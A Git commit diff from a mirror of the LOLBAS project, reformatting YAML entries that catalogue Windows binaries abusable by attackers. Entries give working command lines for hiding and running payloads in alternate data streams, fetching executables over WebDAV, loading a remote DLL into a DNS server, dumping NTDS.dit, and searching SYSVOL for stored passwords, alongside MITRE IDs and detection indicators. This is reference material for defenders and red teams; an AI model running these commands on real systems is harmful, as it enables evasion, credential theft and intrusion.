public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2024-12-26 06:49:09 +01:00
Code Issues Projects Releases Wiki Activity

Changed all OSBinaries according to the new template

Browse Source
This commit is contained in:
Oddvar Moe 2018-09-24 21:59:43 +02:00
parent 68884a4c13
commit 37cc1ee83e
66 changed files with 1448 additions and 698 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
Mgmt-Scripts/Draft-MDFromYaml-webportal.ps1
View File

@ -30,11 +30,15 @@ function Convert-YamlToMD
"description: $($YamlObject.Description)"| Add-Content $Outfile
"function:"| Add-Content $Outfile
# Need a category linked to the different things... Execute, Download, AWL-bypass.
" execute:"| Add-Content $Outfile
foreach($cmd in $YamlObject.Commands)
{
" - description: $($cmd.description)"| Add-Content $Outfile
" code: $($cmd.command)"| Add-Content $Outfile
" $($cmd.Category):"| Add-Content $Outfile
" - description: $($cmd.Description)"| Add-Content $Outfile
" code: $($cmd.Command)"| Add-Content $Outfile
" code: $($cmd.Command)"| Add-Content $Outfile
" mitreid: $($cmd.MitreID)"| Add-Content $Outfile
" mitrelink: $($cmd.MitreLink)"| Add-Content $Outfile
}
"resources:"| Add-Content $Outfile
foreach($link in $YamlObject.Resources)
@ -108,13 +112,11 @@ function Invoke-GenerateMD
#Generate the stuff!
#Bins
Invoke-GenerateMD -YmlPath "$mainpath\yml\OSBinaries" -Outpath "c:\tamp\Binaries" -Verbose
#Invoke-GenerateMD -YmlPath "$mainpath\yml\OSBinaries" -Outpath "c:\tamp\Binaries" -Verbose
Invoke-GenerateMD -YmlPath "$mainpath\yml\OtherMSBinaries" -Outpath "c:\tamp\OtherMSBinaries" -Verbose
Invoke-GenerateMD -YmlPath "$mainpath\yml\OtherBinaries" -Outpath "c:\tamp\OtherBinaries" -Verbose
#
##Scripts
Invoke-GenerateMD -YmlPath "$mainpath\yml\OSScripts" -Outpath "c:\tamp\SCripts" -Verbose
Invoke-GenerateMD -YmlPath "$mainpath\yml\OtherScripts" -Outpath "c:\tamp\OtherScripts" -Verbose
#
#Invoke-GenerateMD -YmlPath "$mainpath\yml\OSScripts" -Outpath "c:\tamp\SCripts" -Verbose
##Libs
Invoke-GenerateMD -YmlPath "$mainpath\yml\OSLibraries" -Outpath "c:\tamp\Libraries" -Verbose
#Invoke-GenerateMD -YmlPath "$mainpath\yml\OSLibraries" -Outpath "c:\tamp\Libraries" -Verbose

0
yml/OSBinaries/Explorer.yml → yml/LOLUtilz/OSBinaries/Explorer.yml
View File

0
yml/OSBinaries/Netsh.yml → yml/LOLUtilz/OSBinaries/Netsh.yml
View File

0
yml/OSBinaries/Nltest.yml → yml/LOLUtilz/OSBinaries/Nltest.yml
View File

0
yml/OSBinaries/Openwith.yml → yml/LOLUtilz/OSBinaries/Openwith.yml
View File

0
yml/OSBinaries/Powershell.yml → yml/LOLUtilz/OSBinaries/Powershell.yml
View File

0
yml/OSBinaries/Psr.yml → yml/LOLUtilz/OSBinaries/Psr.yml
View File

0
yml/OSBinaries/Robocopy.yml → yml/LOLUtilz/OSBinaries/Robocopy.yml
View File

4
yml/OSBinaries/Atbroker.yml
View File

@ -13,8 +13,8 @@ Commands:
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 8, Windows 8.1, Windows 10
Full Path:
- path: C:\Windows\System32\Atbroker.exe
- path: C:\Windows\SysWOW64\Atbroker.exe
- Path: C:\Windows\System32\Atbroker.exe
- Path: C:\Windows\SysWOW64\Atbroker.exe
Code Sample:
- Code:
Detection:

4
yml/OSBinaries/Bash.yml
View File

@ -21,8 +21,8 @@ Commands:
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 10
Full Path:
- path: C:\Windows\System32\bash.exe
- path: C:\Windows\SysWOW64\bash.exe
- Path: C:\Windows\System32\bash.exe
- Path: C:\Windows\SysWOW64\bash.exe
Code Sample:
- Code:
Detection:

6
yml/OSBinaries/Bitsadmin.yml
View File

@ -1,5 +1,5 @@
---
Name: bitsadmin.exe
Name: Bitsadmin.exe
Description: Used for managing background intelligent transfer
Author: 'Oddvar Moe'
Created: '2018-05-25'
@ -37,8 +37,8 @@ Commands:
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- path: C:\Windows\System32\bitsadmin.exe
- path: C:\Windows\SysWOW64\bitsadmin.exe
- Path: C:\Windows\System32\bitsadmin.exe
- Path: C:\Windows\SysWOW64\bitsadmin.exe
Code Sample:
- Code:
Detection:

4
yml/OSBinaries/Certutil.yml
View File

@ -37,8 +37,8 @@ Commands:
MitreLink: https://attack.mitre.org/wiki/Technique/T1140
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- path: C:\Windows\System32\certutil.exe
- path: C:\Windows\SysWOW64\certutil.exe
- Path: C:\Windows\System32\certutil.exe
- Path: C:\Windows\SysWOW64\certutil.exe
Code Sample:
- Code:
Detection:

4
yml/OSBinaries/Cmdkey.yml
View File

@ -13,8 +13,8 @@ Commands:
MitreLink: https://attack.mitre.org/wiki/Technique/T1078
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- path: C:\Windows\System32\cmdkey.exe
- path: C:\Windows\SysWOW64\cmdkey.exe
- Path: C:\Windows\System32\cmdkey.exe
- Path: C:\Windows\SysWOW64\cmdkey.exe
Code Sample:
- Code:
Detection:

4
yml/OSBinaries/Cmstp.yml
View File

@ -21,8 +21,8 @@ Commands:
MitreLink: https://attack.mitre.org/wiki/Technique/T1191
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- path: C:\Windows\System32\cmstp.exe
- path: C:\Windows\SysWOW64\cmstp.exe
- Path: C:\Windows\System32\cmstp.exe
- Path: C:\Windows\SysWOW64\cmstp.exe
Code Sample:
- Code:
Detection:

36
yml/OSBinaries/Control.yml
View File

@ -1,21 +1,31 @@
---
Name: Control.exe
Description: Execute, Read ADS
Author: ''
Description: Binary used to launch controlpanel items in Windows
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: control.exe c:\windows\tasks\file.txt:evil.dll
Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS).
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
Category: Alternate data streams
Privileges: User
MitreID: T1196
MitreLink: https://attack.mitre.org/wiki/Technique/T1196
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- 'C:\Windows\system32\control.exe '
- 'C:\Windows\sysWOW64\control.exe '
Code Sample: []
Detection: []
- Path: C:\Windows\System32\control.exe
- Path: C:\Windows\SysWOW64\control.exe
Code Sample:
- Code:
Detection:
- IOC: Control.exe executing files from alternate data streams.
Resources:
- https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/
- https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/
- https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/
- https://twitter.com/bohops/status/955659561008017409
Notes: Thanks to Jimmy - @bohops
- Link: https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/
- Link: https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/
- Link: https://twitter.com/bohops/status/955659561008017409
- Link: https://docs.microsoft.com/en-us/windows/desktop/shell/executing-control-panel-items
- Link: https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/
Acknowledgement:
- Person: Jimmy
Handle: '@bohops'
---

40
yml/OSBinaries/Csc.yml
View File

@ -1,21 +1,35 @@
---
Name: Csc.exe
Description: Compile
Author: ''
Description: Binary file used by .NET to compile C# code
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: csc -out:My.exe File.cs
- Command: csc.exe -out:My.exe File.cs
Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe.
Usecase: Compile attacker code on system. Bypass defensive counter measures.
Category: Compile
Privileges: User
MitreID: T1127
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: csc -target:library File.cs
Description: ''
Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to a dll file.
Usecase: Compile attacker code on system. Bypass defensive counter measures.
Category: Compile
Privileges: User
MitreID: T1127
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
Code Sample: []
Detection: []
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
Code Sample:
- Code:
Detection:
- IOC: Csc.exe should normally not run a system unless it is used for development.
Resources:
- https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe
- ''
Notes: Thanks to ?
- Link: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe
Acknowledgement:
- Person:
Handle:
---

31
yml/OSBinaries/Cscript.yml
View File

@ -1,19 +1,28 @@
---
Name: Cscript.exe
Description: Execute, Read ADS
Author: ''
Description: Binary used to execute scripts in Windows
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: cscript c:\ads\file.txt:script.vbs
Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
Category: Alternate data streams
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- c:\windows\system32\cscript.exe
- c:\windows\sysWOW64\cscript.exe
Code Sample: []
Detection: []
- Path: C:\Windows\System32\cscript.exe
- Path: C:\Windows\SysWOW64\cscript.exe
Code Sample:
- Code:
Detection:
- IOC: Cscript.exe executing files from alternate data streams
Resources:
- https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
- https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
Notes: Thanks to Oddvar Moe - @oddvarmoe
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
- Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

34
yml/OSBinaries/Dfsvc.yml
View File

@ -1,19 +1,29 @@
---
Name: Dfsvc.exe
Description: Execute
Author: ''
Description: ClickOnce engine in Windows used by .NET
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: Missing Example
Description: ''
Description: Missing example
Usecase: Use binary to bypass Application whitelisting
Category: AWL bypass
Privileges: User
MitreID: T1127
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe '
- 'C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe '
- 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe '
- 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe '
Code Sample: []
Detection: []
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
Code Sample:
- Code:
Detection:
- IOC:
Resources:
- https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
Notes: Thanks to Casey Smith - @subtee
- Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
Acknowledgement:
- Person: Casey Smith
Handle: '@subtee'
---

38
yml/OSBinaries/Diskshadow.yml
View File

@ -1,20 +1,36 @@
---
Name: Diskshadow.exe
Description: Execute, Dump NTDS.dit
Author: ''
Description: Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS).
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: diskshadow.exe /s c:\test\diskshadow.txt
Description: Execute commands using diskshadow.exe from a prepared diskshadow script.
Usecase: Use diskshadow to exfiltrate data from VSS such as NTDS.dit
Category: Dump
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows server
- Command: diskshadow> exec calc.exe
Description: Execute a calc.exe using diskshadow.exe.
Description: Execute commands using diskshadow.exe to spawn child process
Usecase: Use diskshadow to bypass defensive counter measures
Category: Execute
Privileges: User
MitreID: T1003
MitreLink: https://attack.mitre.org/wiki/Technique/T1003
OperatingSystem: Windows server
Full Path:
- c:\windows\system32\diskshadow.exe
- c:\windows\sysWOW64\diskshadow.exe
Code Sample: []
Detection: []
- Path: C:\Windows\System32\diskshadow.exe
- Path: C:\Windows\SysWOW64\diskshadow.exe
Code Sample:
- Code:
Detection:
- IOC: Child process from diskshadow.exe
- IOC: Diskshadow reading input from file
Resources:
- https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
Notes: Thanks to Jimmy - @bohops
- Link: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
Acknowledgement:
- Person: Jimmy
Handle: '@bohops'
---

27
yml/OSBinaries/Dns.yml
View File

@ -1,27 +0,0 @@
---
Name: Dnscmd.exe
Description: Execute
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
Description: 'Adds a specially crafted DLL as a plug-in of the DNS Service.'
Full Path:
- c:\windows\system32\Dnscmd.exe
- c:\windows\sysWOW64\Dnscmd.exe
Code Sample: []
Detection: []
Resources:
- https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
- https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
- https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp
- https://twitter.com/Hexacorn/status/994000792628719618
- http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html
Notes: |
This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the refference links for DLL details.
Thanks to Shay Ber - ?,
Dimitrios Slamaris - @dim0x69,
Nikhil SamratAshok,
Mittal - @nikhil_mitt

35
yml/OSBinaries/Dnscmd.yml Normal file
View File

@ -0,0 +1,35 @@
---
Name: Dnscmd.exe
Description: A command-line interface for managing DNS servers
Author: 'Oddvar Moe'
Created: '2018-05-25'
Commands:
- Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details.
Usecase: Remotly inject dll to dns server
Category: Execute
Privileges: DNS admin
MitreID: T1035
MitreLink: https://attack.mitre.org/wiki/Technique/T1035
OperatingSystem: Windows server
Full Path:
- Path: C:\Windows\System32\Dnscmd.exe
- Path: C:\Windows\SysWOW64\Dnscmd.exe
Code Sample:
- Code:
Detection:
- IOC: Dnscmd.exe loading dll from UNC path
Resources:
- Link: https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
- Link: https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
- Link: https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp
- Link: https://twitter.com/Hexacorn/status/994000792628719618
- Link: http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html
Acknowledgement:
- Person: Shay Ber
Handle:
- Person: Dimitrios Slamaris
Handle: '@dim0x69'
- Person: Nikhil SamratAshok
Handle: '@nikhil_mitt'
---

59
yml/OSBinaries/Esentutl.yml
View File

@ -1,28 +1,59 @@
---
Name: Esentutl.exe
Description: Copy, Download, Write ADS, Read ADS
Author: ''
Description: Binary for working with Microsoft Joint Engine Technology (JET) database
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o
Description: Copies the source VBS file to the destination VBS file.
Usecase: Copies files from A to B
Category: Copy
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o
Description: Copies the source EXE to an Alternate Data Stream (ADS) of the destination file.
Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
Category: Alternate data streams
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o
Description: Copies the source Alternate Data Stream (ADS) to the destination EXE.
- Command: esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
Description: Copies the source EXE to the destination Alternate Data Stream (ADS) of the destination file.
- Command: esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.exe /o
Description: Copies the source EXE to the destination EXE file.
Usecase: Extract hidden file within alternate data streams
Category: Alternate data streams
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.
Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
Category: Alternate data streams
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
Description: Copies the source EXE to the destination EXE file
Usecase: Use to copy files from one unc path to another
Category: Download
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- c:\windows\system32\esentutl.exe
- c:\windows\sysWOW64\esentutl.exe
Code Sample: []
Detection: []
- Path: C:\Windows\System32\esentutl.exe
- Path: C:\Windows\SysWOW64\esentutl.exe
Code Sample:
- Code:
Detection:
- IOC:
Resources:
- https://twitter.com/egre55/status/985994639202283520
Notes: Thanks to egre55 - @egre55
- Link: https://twitter.com/egre55/status/985994639202283520
Acknowledgement:
- Person: egre55
Handle: '@egre55'
---

51
yml/OSBinaries/Expand.yml
View File

@ -1,23 +1,46 @@
---
Name: Expand.exe
Description: Download, Copy, Add ADS
Author: ''
Description: Binary that expands one or more compressed files
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: expand \\webdav\folder\file.bat c:\ADS\file.bat
Description: 'Copies source file to destination.'
Description: Copies source file to destination.
Usecase: Use to copies the source file to the destination file
Category: Download
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: expand c:\ADS\file1.bat c:\ADS\file2.bat
Description: 'Copies source file to destination.'
Description: Copies source file to destination.
Usecase: Copies files from A to B
Category: Copy
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
Description: 'Copies source file to destination Alternate Data Stream (ADS).'
Description: Copies source file to destination Alternate Data Stream (ADS)
Usecase: Copies files from A to B
Category: Alternate data streams
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- c:\windows\system32\Expand.exe
- c:\windows\sysWOW64\Expand.exe
Code Sample: []
Detection: []
- Path: C:\Windows\System32\Expand.exe
- Path: C:\Windows\SysWOW64\Expand.exe
Code Sample:
- Code:
Detection:
- IOC:
Resources:
- https://twitter.com/infosecn1nja/status/986628482858807297
- https://twitter.com/Oddvarmoe/status/986709068759949319
Notes: Thanks to Rahmat Nurfauzi - @infosecn1nja, Oddvar Moe - @oddvarmoe
- Link: https://twitter.com/infosecn1nja/status/986628482858807297
- Link: https://twitter.com/Oddvarmoe/status/986709068759949319
Acknowledgement:
- Person: Rahmat Nurfauzi
Handle: '@infosecn1nja'
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

31
yml/OSBinaries/Extexport.yml
View File

@ -1,18 +1,27 @@
---
Name: Extexport.exe
Description: Execute
Author: ''
Description:
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: Extexport.exe c:\test foo bar
Description: 'Load a DLL located in the c:\\test folder with one of the following names: mozcrt19.dll, mozsqlite3.dll, or sqlite.dll'
Description: Load a DLL located in the c:\test folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll
Usecase: Execute dll file
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- 'C:\Program Files\Internet Explorer\Extexport.exe '
- C:\Program Files\Internet Explorer(x86)\Extexport.exe
Code Sample: []
Detection: []
- Path: C:\Program Files\Internet Explorer\Extexport.exe
- Path: C:\Program Files\Internet Explorer(x86)\Extexport.exe
Code Sample:
- Code:
Detection:
- IOC: Extexport.exe loads dll and is execute from other folder the original path
Resources:
- http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/
Notes: Thanks to Adam - @hexacorn
- Link: http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/
Acknowledgement:
- Person: Adam
Handle: '@hexacorn'
---

53
yml/OSBinaries/Extrac32.yml
View File

@ -1,24 +1,47 @@
---
Name: Extrac32.exe
Description: Add ADS, Download
Author: ''
Description:
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
Description: 'Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.'
Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.
Usecase: Extract data from cab file and hide it in an alternate data stream.
Category: Alternate data streams
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
Description: 'Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.'
Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.
Usecase: Extract data from cab file and hide it in an alternate data stream.
Category: Alternate data streams
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
Description: 'Copy the source file to the destination file and overwrite it.'
Description: Copy the source file to the destination file and overwrite it.
Usecase: Download file from UNC/WEBDav
Category: Download
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- c:\windows\system32\extrac32.exe
- c:\windows\sysWOW64\extrac32.exe
Code Sample: []
Detection: []
- Path: C:\Windows\System32\extrac32.exe
- Path: C:\Windows\SysWOW64\extrac32.exe
Code Sample:
- Code:
Detection:
- IOC:
Resources:
- https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
- https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
- https://twitter.com/egre55/status/985994639202283520
Notes: Thanks to Oddvar Moe - @oddvarmoe, egre55 - @egre55
- Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
- Link: https://twitter.com/egre55/status/985994639202283520
Acknowledgement:
- Person: egre55
Handle: '@egre55'
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

59
yml/OSBinaries/Findstr.yml
View File

@ -1,23 +1,52 @@
---
Name: Findstr.exe
Description: Add ADS, Search
Author: ''
Description:
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
Description: 'Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.'
Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
Usecase: Add a file to an alternate data stream to hide from defensive counter measures
Category: Alternate data streams
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe
Description: 'Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.'
- Command: findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
Description: 'Search for stored password in Group Policy files stored on SYSVOL.'
Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
Usecase: Add a file to an alternate data stream from a webdav server to hide from defensive counter measures
Category: Alternate data streams
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: findstr /S /I cpassword \\sysvol\policies\*.xml
Description: Search for stored password in Group Policy files stored on SYSVOL.
Usecase: Find credentials stored in cpassword attrbute
Category: Credentials
Privileges: User
MitreID: T1081
MitreLink: https://attack.mitre.org/wiki/Technique/T1081
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe
Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is downloaded to the target file.
Usecase: Download/Copy file from webdav server
Category: Download
Privileges: User
MitreID: T1185
MitreLink: https://attack.mitre.org/wiki/Technique/T1185
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- c:\windows\system32\findstr.exe
- c:\windows\sysWOW64\findstr.exe
Code Sample: []
Detection: []
- Path: C:\Windows\System32\findstr.exe
- Path: C:\Windows\SysWOW64\findstr.exe
Code Sample:
- Code:
Detection:
- IOC: finstr.exe should normally not be invoked on a client system
Resources:
- https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
- https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Notes: Thanks to Oddvar Moe - @oddvarmoe
- Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

45
yml/OSBinaries/Forfiles.yml
View File

@ -1,22 +1,39 @@
---
Name: Forfiles.exe
Description: Execute, Read ADS
Author: ''
Description: Selects and executes a command on a file or set of files. This command is useful for batch processing.
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
Description: 'Executes calc.exe since there is a match for notepad.exe in the c:\\windows\\System32 folder.'
Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder.
Usecase: Use forfiles to start a new process to evade defensive counter measures
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
Description: 'Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\\windows\\system32 folder.'
Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder.
Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream
Category: Alternate data streams
